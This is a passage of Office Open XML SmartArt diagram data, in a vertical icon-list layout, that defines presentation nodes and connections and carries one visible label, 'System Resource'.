    <dgm:pt modelId="{EDD669AB-28E0-4A58-A3E7-AF20AC5877BF}" type="pres">
      <dgm:prSet presAssocID="{9DC8F1CE-95CF-4E64-B63A-8B72DA006F07}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ABF60EAA-31AA-4240-A0B8-4060F20D71EC}" type="pres">
      <dgm:prSet presAssocID="{9DC8F1CE-95CF-4E64-B63A-8B72DA006F07}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="4" presStyleCnt="8"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B7D310BA-731E-4DAB-8922-8A964BDD8C7F}" type="pres">
      <dgm:prSet presAssocID="{9DC8F1CE-95CF-4E64-B63A-8B72DA006F07}" presName="iconRect" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="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D027BF0F-317D-4BB0-B4F0-5830C69315AD}" type="pres">
      <dgm:prSet presAssocID="{9DC8F1CE-95CF-4E64-B63A-8B72DA006F07}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{42400F0F-B816-47F9-9F38-7E6024298189}" type="pres">
      <dgm:prSet presAssocID="{9DC8F1CE-95CF-4E64-B63A-8B72DA006F07}" presName="parTx" presStyleLbl="revTx" presStyleIdx="4" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0FB51226-841B-4C75-99A7-E4E17E821522}" type="pres">
      <dgm:prSet presAssocID="{81FF7AFF-8249-483E-AB3D-03CC09407AC9}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2C48F908-ECE3-4640-8BCB-B2548A437B0E}" type="pres">
      <dgm:prSet presAssocID="{A93BA111-EA40-494C-8CB2-6C2E70D9C071}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3DEE4272-2B2C-4D5C-AD21-9FB8C2201B49}" type="pres">
      <dgm:prSet presAssocID="{A93BA111-EA40-494C-8CB2-6C2E70D9C071}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="5" presStyleCnt="8"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AC20E838-98DA-45C9-AD68-471C6A36C110}" type="pres">
      <dgm:prSet presAssocID="{A93BA111-EA40-494C-8CB2-6C2E70D9C071}" presName="iconRect" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="8"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4E28F618-B824-46D9-8C4E-F55D3BA0C77E}" type="pres">
      <dgm:prSet presAssocID="{A93BA111-EA40-494C-8CB2-6C2E70D9C071}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E5DE092D-9121-4F0A-B075-31425980958C}" type="pres">
      <dgm:prSet presAssocID="{A93BA111-EA40-494C-8CB2-6C2E70D9C071}" presName="parTx" presStyleLbl="revTx" presStyleIdx="5" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FB7D00E4-13E5-4CDA-89F9-35A3F4629C5E}" type="pres">
      <dgm:prSet presAssocID="{F0D5D207-6601-4758-89E4-1145F6883FC3}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{40DCFF0F-C2BE-494B-9343-01D6E9E75B56}" type="pres">
      <dgm:prSet presAssocID="{65B88102-BB17-4F6F-9B9E-7866ECC50B53}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{19B96CFD-39C5-4F9A-AD90-23B1BBCE1ED6}" type="pres">
      <dgm:prSet presAssocID="{65B88102-BB17-4F6F-9B9E-7866ECC50B53}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="6" presStyleCnt="8"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D391A9E7-84F1-4D8A-A7F2-ED3C6A3E36C0}" type="pres">
      <dgm:prSet presAssocID="{65B88102-BB17-4F6F-9B9E-7866ECC50B53}" presName="iconRect" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="8"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0D26E3DE-41BE-4B61-B14B-337A8C719417}" type="pres">
      <dgm:prSet presAssocID="{65B88102-BB17-4F6F-9B9E-7866ECC50B53}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{567BB4A5-E307-4786-BA08-9A867932E4AD}" type="pres">
      <dgm:prSet presAssocID="{65B88102-BB17-4F6F-9B9E-7866ECC50B53}" presName="parTx" presStyleLbl="revTx" presStyleIdx="6" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{15C4C2B6-5B54-4ACE-9544-0F6E8CD85A9E}" type="pres">
      <dgm:prSet presAssocID="{E58F1D69-1975-42A8-82CC-6CC0BA322C51}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FACEB261-04F8-47FF-86C6-178FD52F71B2}" type="pres">
      <dgm:prSet presAssocID="{A667BD2A-93C0-49DC-A5E7-1B24E7C3DA87}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{92F87DDF-0B0E-4375-9761-288D6990C708}" type="pres">
      <dgm:prSet presAssocID="{A667BD2A-93C0-49DC-A5E7-1B24E7C3DA87}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="7" presStyleCnt="8"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0DC3E471-0624-453E-B935-BC0F76BF44FE}" type="pres">
      <dgm:prSet presAssocID="{A667BD2A-93C0-49DC-A5E7-1B24E7C3DA87}" presName="iconRect" presStyleLbl="node1" presStyleIdx="7" presStyleCnt="8"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{572DDEA1-C4D5-44AD-BA80-D6AF3DD366E6}" type="pres">
      <dgm:prSet presAssocID="{A667BD2A-93C0-49DC-A5E7-1B24E7C3DA87}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BB9382BC-B5B9-430A-96E9-FD0E60966E80}" type="pres">
      <dgm:prSet presAssocID="{A667BD2A-93C0-49DC-A5E7-1B24E7C3DA8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BC45F103-7013-47D0-88AA-48E856B29925}" type="presOf" srcId="{A667BD2A-93C0-49DC-A5E7-1B24E7C3DA87}" destId="{BB9382BC-B5B9-430A-96E9-FD0E60966E80}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{2FD0580C-C73C-4170-B320-25BA4DF74B53}" type="presOf" srcId="{6EEB8F26-BCD5-4D67-9805-7243821BA096}" destId="{068F0B8E-DF56-4C8A-8E62-28FFBE23C13E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{4998A328-4847-4EFE-AE44-05CAB0212F7B}" srcId="{1453F628-A07E-4F8F-8ECA-EBA9803CFDDA}" destId="{9DC8F1CE-95CF-4E64-B63A-8B72DA006F07}" srcOrd="4" destOrd="0" parTransId="{5E66C81A-3638-4F10-BB6C-141195483838}" sibTransId="{81FF7AFF-8249-483E-AB3D-03CC09407AC9}"/>
    <dgm:cxn modelId="{088B6D2B-FC15-4DEA-9801-FEB08A14CB87}" srcId="{1453F628-A07E-4F8F-8ECA-EBA9803CFDDA}" destId="{4F95D182-B3A2-474F-9496-BF7015D6E23D}" srcOrd="1" destOrd="0" parTransId="{02B4A197-9371-41E7-8404-3FDA6E5937A3}" sibTransId="{46F2F3BA-27D1-4722-9E25-A1B5511E9726}"/>
    <dgm:cxn modelId="{A5A2E35C-157E-4301-A607-8AFA1C724705}" type="presOf" srcId="{65B88102-BB17-4F6F-9B9E-7866ECC50B53}" destId="{567BB4A5-E307-4786-BA08-9A867932E4AD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B53C5067-BBF2-4251-9803-E874C2A5423C}" srcId="{1453F628-A07E-4F8F-8ECA-EBA9803CFDDA}" destId="{A667BD2A-93C0-49DC-A5E7-1B24E7C3DA87}" srcOrd="7" destOrd="0" parTransId="{3099FD3E-4AA2-46A0-B155-36D1ACE4F075}" sibTransId="{D5E53688-0086-4512-BC0A-9AAEB165F1B0}"/>
    <dgm:cxn modelId="{15372E4D-87D9-4E9F-8CFB-537D6B6EFA9F}" srcId="{1453F628-A07E-4F8F-8ECA-EBA9803CFDDA}" destId="{A93BA111-EA40-494C-8CB2-6C2E70D9C071}" srcOrd="5" destOrd="0" parTransId="{F6400A0F-A324-46CA-ACD7-B640A717187F}" sibTransId="{F0D5D207-6601-4758-89E4-1145F6883FC3}"/>
    <dgm:cxn modelId="{56CDBB73-8077-4899-9D7A-C7F91BB415B5}" srcId="{1453F628-A07E-4F8F-8ECA-EBA9803CFDDA}" destId="{3FC5A7D4-F053-43CD-B48F-8252A58A0477}" srcOrd="3" destOrd="0" parTransId="{0EE34FF2-68BD-465E-9F45-7FAEAED02D30}" sibTransId="{1AECD76F-F454-42ED-89CA-083E865E3DBB}"/>
    <dgm:cxn modelId="{6DFC0355-3E53-4A08-8208-2DF1DDCF1055}" srcId="{1453F628-A07E-4F8F-8ECA-EBA9803CFDDA}" destId="{65B88102-BB17-4F6F-9B9E-7866ECC50B53}" srcOrd="6" destOrd="0" parTransId="{9424AF03-57E1-4C3C-817C-F7BEA77EA9AE}" sibTransId="{E58F1D69-1975-42A8-82CC-6CC0BA322C51}"/>
    <dgm:cxn modelId="{A0828075-33EF-444C-B7FB-416D9AEE841C}" type="presOf" srcId="{4F95D182-B3A2-474F-9496-BF7015D6E23D}" destId="{3955FD24-0EA7-4649-BD2C-124ABE1CBB6B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D69E3257-2C9A-45F1-8CFE-65023B811E7A}" srcId="{1453F628-A07E-4F8F-8ECA-EBA9803CFDDA}" destId="{6EEB8F26-BCD5-4D67-9805-7243821BA096}" srcOrd="2" destOrd="0" parTransId="{4E324BA9-542B-4024-A65D-EF523AD2D7D2}" sibTransId="{17B19E98-0C5B-45D7-BC7A-D53C8A353F56}"/>
    <dgm:cxn modelId="{62C48594-5354-4B46-BFA6-45D2296DA2F4}" type="presOf" srcId="{A64B4CE9-C850-43D0-A278-200F7417E0C2}" destId="{B9F7B09E-EEA2-4F45-ABD8-D2CF985D577C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{CEEDBE99-93E9-42D9-9FED-1AC7CA49460F}" type="presOf" srcId="{A93BA111-EA40-494C-8CB2-6C2E70D9C071}" destId="{E5DE092D-9121-4F0A-B075-31425980958C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{7E353A9A-0A8A-46D3-A5FC-5EEDB3E22394}" srcId="{1453F628-A07E-4F8F-8ECA-EBA9803CFDDA}" destId="{A64B4CE9-C850-43D0-A278-200F7417E0C2}" srcOrd="0" destOrd="0" parTransId="{198DB813-F8E3-469B-B884-6DFEA91A5F29}" sibTransId="{9E4F3054-699E-4641-A7BF-52293F450EAF}"/>
    <dgm:cxn modelId="{29B1AAA1-2296-4B7B-8D91-4921A33670C2}" type="presOf" srcId="{1453F628-A07E-4F8F-8ECA-EBA9803CFDDA}" destId="{62592D8C-9406-4024-A70D-7A5660A9CBFC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{A8B04AA9-361E-405A-8CA4-C4870455373B}" type="presOf" srcId="{9DC8F1CE-95CF-4E64-B63A-8B72DA006F07}" destId="{42400F0F-B816-47F9-9F38-7E6024298189}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{503258E5-C6DB-43B9-8B30-904BE1ADCFEF}" type="presOf" srcId="{3FC5A7D4-F053-43CD-B48F-8252A58A0477}" destId="{82912080-31C0-45F6-B583-B21C85C721F3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{7E71DEC3-60F3-4161-8F67-6AACF10FC8CF}" type="presParOf" srcId="{62592D8C-9406-4024-A70D-7A5660A9CBFC}" destId="{6B6BD180-5074-4574-9AB0-DB612C075BC6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{174FB055-FD13-43E7-8016-0A1E73787E22}" type="presParOf" srcId="{6B6BD180-5074-4574-9AB0-DB612C075BC6}" destId="{13C2C2E1-E5B1-47D3-BB5E-CF2625F675AF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{28EDFD6D-7F8E-48E0-BEEE-E715D738E711}" type="presParOf" srcId="{6B6BD180-5074-4574-9AB0-DB612C075BC6}" destId="{A0C4BC85-008C-4416-96A5-C3107F5360A7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B7AB5E34-9AC6-4700-8E10-6E69E896A50B}" type="presParOf" srcId="{6B6BD180-5074-4574-9AB0-DB612C075BC6}" destId="{5D30EEB8-C4DD-4A48-89BD-217E7C3C27EF}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{4605B236-A93E-4982-B8EF-55CE96A9F49E}" type="presParOf" srcId="{6B6BD180-5074-4574-9AB0-DB612C075BC6}" destId="{B9F7B09E-EEA2-4F45-ABD8-D2CF985D577C}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{807556C0-76B4-4C08-B62E-3F8BB275A397}" type="presParOf" srcId="{62592D8C-9406-4024-A70D-7A5660A9CBFC}" destId="{FA74DD29-B557-48BC-B82E-9B64E51B9201}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{00888D73-E3D4-4327-910E-17A776D0D71D}" type="presParOf" srcId="{62592D8C-9406-4024-A70D-7A5660A9CBFC}" destId="{382FF604-6801-4A28-8A96-D744E7FEB1AB}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{F8765AAB-CF83-4F98-8BAE-DFF036A9D278}" type="presParOf" srcId="{382FF604-6801-4A28-8A96-D744E7FEB1AB}" destId="{10F75C7F-AD7E-49F5-BB32-7F1D962152D0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{4B3E10B4-578E-4A17-A9BB-479F25757452}" type="presParOf" srcId="{382FF604-6801-4A28-8A96-D744E7FEB1AB}" destId="{F2B4048A-F38B-4884-87D5-3E57DF56F6D6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{550AF7FB-5658-4AFA-B80F-FABF857F8EED}" type="presParOf" srcId="{382FF604-6801-4A28-8A96-D744E7FEB1AB}" destId="{0FFA5511-A216-4F45-BC29-B9ADABBFD374}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{658A2548-ADD7-4C97-B1B6-24E23A62D220}" type="presParOf" srcId="{382FF604-6801-4A28-8A96-D744E7FEB1AB}" destId="{3955FD24-0EA7-4649-BD2C-124ABE1CBB6B}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{E562468D-A059-4971-8E6F-7A2C13B0619C}" type="presParOf" srcId="{62592D8C-9406-4024-A70D-7A5660A9CBFC}" destId="{DD633545-74DF-4182-93DA-D063BC038F7C}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{061D1B86-D0A7-4479-A303-F367E53A0F6A}" type="presParOf" srcId="{62592D8C-9406-4024-A70D-7A5660A9CBFC}" destId="{384E1C2B-7AFE-4966-B712-1A77CDD39090}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{71AEFF45-5601-4188-A55C-FF9E97F41585}" type="presParOf" srcId="{384E1C2B-7AFE-4966-B712-1A77CDD39090}" destId="{0AB0DF4A-289A-4C10-827A-0DDBD7B6212B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{2FC9D4E7-4F0C-4589-AF2A-C892C6657B8B}" type="presParOf" srcId="{384E1C2B-7AFE-4966-B712-1A77CDD39090}" destId="{8FA61617-BA42-4D7E-8224-7168DCF33A99}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{BD43C078-B923-4038-84B8-9C79BA3024F4}" type="presParOf" srcId="{384E1C2B-7AFE-4966-B712-1A77CDD39090}" destId="{94748014-7C08-4ADC-AD8D-E0D99BAA35B4}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{C986EFC1-5976-426E-A693-FBE503A28954}" type="presParOf" srcId="{384E1C2B-7AFE-4966-B712-1A77CDD39090}" destId="{068F0B8E-DF56-4C8A-8E62-28FFBE23C13E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B514BCB8-F765-46B1-84CA-85ECD00516D6}" type="presParOf" srcId="{62592D8C-9406-4024-A70D-7A5660A9CBFC}" destId="{27AB9850-925B-4758-9AE8-4FE67CF6F162}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{8D825ED3-9ABA-4DEF-BA3D-B9D183D2B070}" type="presParOf" srcId="{62592D8C-9406-4024-A70D-7A5660A9CBFC}" destId="{9096CE49-398F-472A-B7EB-7CB45C2A2CFA}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{08D51184-36A0-458C-9662-573D43A24764}" type="presParOf" srcId="{9096CE49-398F-472A-B7EB-7CB45C2A2CFA}" destId="{9B8B9752-E0F7-4BB7-9E3F-8C03374983B9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{5664AB8C-8664-42D7-9F5B-2122E1E97770}" type="presParOf" srcId="{9096CE49-398F-472A-B7EB-7CB45C2A2CFA}" destId="{6695C1F7-EF7F-4A02-B7A4-37956C9FE393}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{0E08D2E4-077B-4CEF-823F-8013F9C7164F}" type="presParOf" srcId="{9096CE49-398F-472A-B7EB-7CB45C2A2CFA}" destId="{CD237CC8-A1AA-482B-B782-A22848EB6F7C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{A89D82FE-C49D-42C2-A04E-07829AB3D49F}" type="presParOf" srcId="{9096CE49-398F-472A-B7EB-7CB45C2A2CFA}" destId="{82912080-31C0-45F6-B583-B21C85C721F3}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{6E4D8AA5-81E4-4D42-A91A-2DF542DEC23E}" type="presParOf" srcId="{62592D8C-9406-4024-A70D-7A5660A9CBFC}" destId="{7541E145-79B1-4CB7-9837-E5B4D94A74D6}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{EA1B5968-ECAC-4D00-814E-AA3BC3731672}" type="presParOf" srcId="{62592D8C-9406-4024-A70D-7A5660A9CBFC}" destId="{EDD669AB-28E0-4A58-A3E7-AF20AC5877BF}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{2D5E99E1-068B-4466-9E80-6E3D5ECE5C94}" type="presParOf" srcId="{EDD669AB-28E0-4A58-A3E7-AF20AC5877BF}" destId="{ABF60EAA-31AA-4240-A0B8-4060F20D71EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{A86FE7C1-C327-4473-85B8-DA51191607EE}" type="presParOf" srcId="{EDD669AB-28E0-4A58-A3E7-AF20AC5877BF}" destId="{B7D310BA-731E-4DAB-8922-8A964BDD8C7F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{91353E80-3A69-45E2-9150-EA95D77DDE43}" type="presParOf" srcId="{EDD669AB-28E0-4A58-A3E7-AF20AC5877BF}" destId="{D027BF0F-317D-4BB0-B4F0-5830C69315AD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{24B1A029-C525-4E10-A585-BFC9002747BE}" type="presParOf" srcId="{EDD669AB-28E0-4A58-A3E7-AF20AC5877BF}" destId="{42400F0F-B816-47F9-9F38-7E6024298189}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{C5321EBD-461C-4253-A26A-7AE416AB5F7C}" type="presParOf" srcId="{62592D8C-9406-4024-A70D-7A5660A9CBFC}" destId="{0FB51226-841B-4C75-99A7-E4E17E821522}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{8696EADD-C929-4EF6-9F38-00CE9172EEB4}" type="presParOf" srcId="{62592D8C-9406-4024-A70D-7A5660A9CBFC}" destId="{2C48F908-ECE3-4640-8BCB-B2548A437B0E}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{E0C1849E-D4E0-4912-A953-7BE51EEF73D0}" type="presParOf" srcId="{2C48F908-ECE3-4640-8BCB-B2548A437B0E}" destId="{3DEE4272-2B2C-4D5C-AD21-9FB8C2201B49}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{4612D7A6-BFF7-43F9-B37B-EFB9882061A7}" type="presParOf" srcId="{2C48F908-ECE3-4640-8BCB-B2548A437B0E}" destId="{AC20E838-98DA-45C9-AD68-471C6A36C110}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{781327ED-D53C-4081-9B75-F2786F4A5FEE}" type="presParOf" srcId="{2C48F908-ECE3-4640-8BCB-B2548A437B0E}" destId="{4E28F618-B824-46D9-8C4E-F55D3BA0C77E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{C085D2CC-EBC9-4E49-9772-345640F04E73}" type="presParOf" srcId="{2C48F908-ECE3-4640-8BCB-B2548A437B0E}" destId="{E5DE092D-9121-4F0A-B075-31425980958C}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{C1ECBE6B-C950-4216-900C-5C76EF3E8C98}" type="presParOf" srcId="{62592D8C-9406-4024-A70D-7A5660A9CBFC}" destId="{FB7D00E4-13E5-4CDA-89F9-35A3F4629C5E}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D208710C-40DD-428F-A0C7-7D32174AE44E}" type="presParOf" srcId="{62592D8C-9406-4024-A70D-7A5660A9CBFC}" destId="{40DCFF0F-C2BE-494B-9343-01D6E9E75B56}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{960CDFF7-2450-4E01-BA62-23CB82CE1274}" type="presParOf" srcId="{40DCFF0F-C2BE-494B-9343-01D6E9E75B56}" destId="{19B96CFD-39C5-4F9A-AD90-23B1BBCE1ED6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{82C1C7CF-8024-481C-B012-D6A73535C721}" type="presParOf" srcId="{40DCFF0F-C2BE-494B-9343-01D6E9E75B56}" destId="{D391A9E7-84F1-4D8A-A7F2-ED3C6A3E36C0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{8B84C9FD-23C3-4C58-8678-D042E7332CC8}" type="presParOf" srcId="{40DCFF0F-C2BE-494B-9343-01D6E9E75B56}" destId="{0D26E3DE-41BE-4B61-B14B-337A8C719417}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{48AC683C-4484-4A15-B59A-3134B79185EF}" type="presParOf" srcId="{40DCFF0F-C2BE-494B-9343-01D6E9E75B56}" destId="{567BB4A5-E307-4786-BA08-9A867932E4AD}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{299C61D2-CCD9-4D44-9D43-6385DAD01BCE}" type="presParOf" srcId="{62592D8C-9406-4024-A70D-7A5660A9CBFC}" destId="{15C4C2B6-5B54-4ACE-9544-0F6E8CD85A9E}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{C5FA716D-D8A0-4771-B74F-1715C6B087E6}" type="presParOf" srcId="{62592D8C-9406-4024-A70D-7A5660A9CBFC}" destId="{FACEB261-04F8-47FF-86C6-178FD52F71B2}" srcOrd="14" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{5890FAFB-92B5-45DF-BCD4-233B1840D515}" type="presParOf" srcId="{FACEB261-04F8-47FF-86C6-178FD52F71B2}" destId="{92F87DDF-0B0E-4375-9761-288D6990C708}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{51360F89-E0D7-406B-865A-0713B275E9BF}" type="presParOf" srcId="{FACEB261-04F8-47FF-86C6-178FD52F71B2}" destId="{0DC3E471-0624-453E-B935-BC0F76BF44FE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{ED216436-F081-41A0-8E7E-BBFD4091C9CE}" type="presParOf" srcId="{FACEB261-04F8-47FF-86C6-178FD52F71B2}" destId="{572DDEA1-C4D5-44AD-BA80-D6AF3DD366E6}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{9B575571-0AF7-4425-96C6-027328FBC322}" type="presParOf" srcId="{FACEB261-04F8-47FF-86C6-178FD52F71B2}" destId="{BB9382BC-B5B9-430A-96E9-FD0E60966E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7692B4F-9C50-4B44-960F-20E8B0DAFE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D0DB85-4D25-4AA2-8260-CB85AD77E513}">
      <dgm:prSet phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>System Resource </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
